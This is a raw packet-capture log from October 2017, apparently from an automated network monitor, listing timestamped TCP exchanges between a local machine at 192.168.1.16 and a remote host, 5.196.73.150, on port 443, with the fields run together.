Okt 17, 2017 21:54:26.781511068 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.784876108 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.785132885 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.814951897 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.815207958 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.822201967 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.822477102 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.835514069 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.835539103 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.835546970 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.835738897 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.842392921 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.842415094 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.842423916 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.842678070 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.850646019 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.850668907 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.850677013 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.850867987 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.875669956 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.875696898 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.875705957 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.875900984 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.882313013 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.882428885 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.910615921 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.910639048 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.910646915 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.910878897 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.917821884 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.917844057 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.917853117 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.918103933 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.942601919 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.942624092 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.942632914 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.942800045 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.964322090 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.964344978 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.964354038 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.964631081 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.964668989 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.965154886 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.971368074 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.971390963 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.971632004 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:26.978542089 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.978564978 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.978574038 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:26.978847980 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.015662909 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.015686989 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.015695095 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.015947104 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.037383080 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.037405014 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.037414074 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.037633896 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.039652109 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.039854050 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.039895058 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.039921999 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.040019989 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.040035963 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.040046930 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.040626049 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.044500113 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.044698954 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.073672056 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.073694944 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.073703051 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.073960066 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.099875927 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.100049019 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.100064993 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.100117922 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.100155115 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.100565910 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.101928949 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.102147102 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.108154058 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.108177900 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.108382940 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.143532038 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.143556118 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.143563986 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.143718958 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.148163080 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.148324013 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.151499987 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.151523113 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.151530981 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.151658058 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.155241013 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.155390024 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.172264099 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.172286987 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.172296047 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.172446966 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.172864914 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.173031092 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.173475027 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.173616886 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.174438953 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.174462080 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.174470901 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.174601078 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.178056955 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.178088903 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.178093910 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.180560112 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.236543894 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.236567020 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.236574888 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.236857891 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.264014959 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.264044046 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.264055967 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.264218092 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.278182030 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.278204918 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.278213024 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.278351068 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.285531998 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.285540104 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.285545111 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.286231041 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.293822050 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.293988943 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.301048040 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.301071882 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.301079988 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.301551104 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.305214882 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.305222988 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.305227041 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.305651903 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.306667089 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.306689978 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.306699038 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.307142973 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.314258099 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.314280987 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.314289093 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.314626932 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.314837933 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.314855099 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.315244913 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.346410036 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.346441031 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.346446991 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.346615076 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.358733892 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.358869076 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.358882904 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.359028101 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.359807014 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.365667105 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.365700006 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.365709066 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.365921021 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.396085978 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.396111012 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.396137953 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.396346092 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.396579981 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.396677017 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.402540922 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.402563095 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.402570963 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.402817011 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.409852028 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.409874916 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.409883022 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.410145998 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.422221899 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.422245026 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.422493935 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.432516098 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.432538986 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.432547092 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.432799101 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.434917927 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.434941053 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.434950113 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.435179949 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.435421944 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.435444117 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.435456038 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.435566902 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.441437006 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.441458941 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.441467047 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.441739082 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.477592945 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.477848053 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.484780073 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.484802008 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.484810114 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.485063076 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.490227938 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.490251064 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.490257978 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.490509987 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.491930008 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.491952896 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.492202997 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.526715040 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.526737928 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.526746035 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.526994944 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.545208931 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.545231104 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.545238972 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.545511961 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.552329063 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.552350998 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.552359104 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.552623034 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.554368019 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.554390907 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.554399014 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.554625988 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.559478998 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.559745073 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.562093019 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.562115908 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.562123060 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.562366962 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.563704967 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.563726902 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.563735008 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.563983917 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.565372944 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.565396070 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.565648079 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.568319082 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.568341017 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.568348885 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.568687916 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.610354900 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.610377073 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.610384941 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.610620975 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.611653090 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.611860991 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.612716913 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.612740040 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.612747908 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.612951040 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.618838072 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.619083881 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.625929117 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.625951052 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.625958920 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.626210928 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.626249075 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.626734018 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.657393932 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.657417059 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.657424927 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.657685041 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.658433914 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.658457994 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.658466101 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.658714056 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.658813000 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.658830881 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.659293890 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.664557934 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.664580107 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.664587021 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.664836884 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.677408934 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.677432060 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.677440882 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.677689075 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.684077978 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.684101105 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.684108973 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.684357882 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.693614960 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.693638086 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.693645954 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.693875074 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.694735050 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.694977999 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.696670055 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.696691990 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.696700096 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.696993113 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.697197914 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.697220087 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.697228909 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.697659969 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.699834108 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.699856043 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.700087070 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.738224030 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.738245964 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.738254070 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.738480091 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.751403093 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.751425028 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.751434088 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.751702070 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.752177000 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.752394915 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.752829075 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.752851009 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.752859116 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.753061056 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.759246111 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.759491920 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.787374020 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.787395954 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.787404060 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.787640095 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.788510084 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.788755894 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.788945913 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.788969994 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.788981915 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.789414883 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.789417982 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.789437056 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.789450884 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.789887905 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.789920092 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.790354013 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.795857906 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.795880079 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.796128035 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.809699059 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.809720993 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.809730053 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.809953928 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.812302113 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.812325001 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.812333107 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.812618017 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.821069956 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.821091890 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.821099997 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.821351051 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.829958916 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.829981089 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.829988956 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.830229998 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.831332922 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.831573963 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.832614899 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.832638025 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.832645893 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.832871914 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.834369898 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.834393024 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.834400892 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.834582090 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.834881067 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.834897995 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.835128069 MESZ49193443192.168.1.165.196.73.150
Okt 17, 2017 21:54:27.869297028 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.869319916 MESZ443491935.196.73.150192.168.1.16
Okt 17, 2017 21:54:27.869330883 MESZ443491935.196.73.150192.168.1.16
